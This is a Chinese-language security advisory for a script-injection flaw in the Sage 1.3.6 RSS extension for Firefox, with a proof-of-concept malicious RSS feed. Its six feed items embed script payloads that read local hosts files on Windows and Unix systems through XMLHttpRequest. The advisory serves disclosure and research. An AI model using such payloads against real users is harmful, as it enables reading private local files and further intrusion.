Mozine Sage 1.3.6描述:
BUGTRAQ ID: 19928
sage是Firefox的一个灵巧的RSS和Atom feed聚合扩展。
sage在处理RSS feed中的内容标签时存在输入验证错误,远程攻击者可能利用此漏洞在用户机器上执行恶意代码。
如果用户受骗添加了恶意的RSS feed并浏览了其内容的话,就会导致在本地环境中注入并执行任意HTML和脚本代码。
<*来源:pdp (pdp.gnucitizen@googlemail.com)
链接:http://secunia.com/advisories/21839/
http://www.gnucitizen.org/blog/cross-context-scripting-with-sage/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
- <rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/">
- <channel>
<title>Cross Context Scripting with Sage</title>
- <item>
<title>WINDOWS: works with "Allow HTML Tags" off</title>
- <content:encoded>
- <![CDATA[ <script>try { request = new XMLHttpRequest(); request.open("GET", "file:///C:/WINDOWS/system32/drivers/etc/hosts"); request.send(null); alert(request.responseText); } catch(e) {}</script>
]]>
</content:encoded>
</item>
- <item>
<title>WINDOWS: works with "Allow HTML Tags" on</title>
- <content:encoded>
- <![CDATA[ <script>try { request = new XMLHttpRequest(); request.open("GET", "file:///C:/WINDOWS/system32/drivers/etc/hosts"); request.send(null); alert(request.responseText); } catch(e) {}</script>
]]>
</content:encoded>
</item>
- <item>
<title>WINNT: works with "Allow HTML Tags" off</title>
- <content:encoded>
- <![CDATA[ <script>try { request = new XMLHttpRequest(); request.open("GET", "file:///C:/WINNT/system32/drivers/etc/hosts"); request.send(null); alert(request.responseText); } catch(e) {}</script>
]]>
</content:encoded>
</item>
- <item>
<title>WINNT: works with "Allow HTML Tags" on</title>
- <content:encoded>
- <![CDATA[ <script>try { request = new XMLHttpRequest(); request.open("GET", "file:///C:/WINNT/system32/drivers/etc/hosts"); request.send(null); alert(request.responseText); } catch(e) {}</script>
]]>
</content:encoded>
</item>
- <item>
<title>UNIX: works with "Allow HTML Tags" off</title>
- <content:encoded>
- <![CDATA[ <script>try { request = new XMLHttpRequest(); request.open("GET", "file:///etc/hosts"); request.send(null); alert(request.responseText); } catch(e) {}</script>
]]>
</content:encoded>
</item>
- <item>
<title>UNIX: works with "Allow HTML Tags" on</title>
- <content:encoded>
- <![CDATA[ <script>try { request = new XMLHttpRequest(); request.open("GET", "file:///etc/hosts"); request.send(null); alert(request.responseText); } catch(e) {}</script>
]]>
</content:encoded>
</item>
</channel>
</rss>
建议:
厂商补丁:
Mozine
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://addons.mozine.org/extensions/moreinfo.php?id=12%22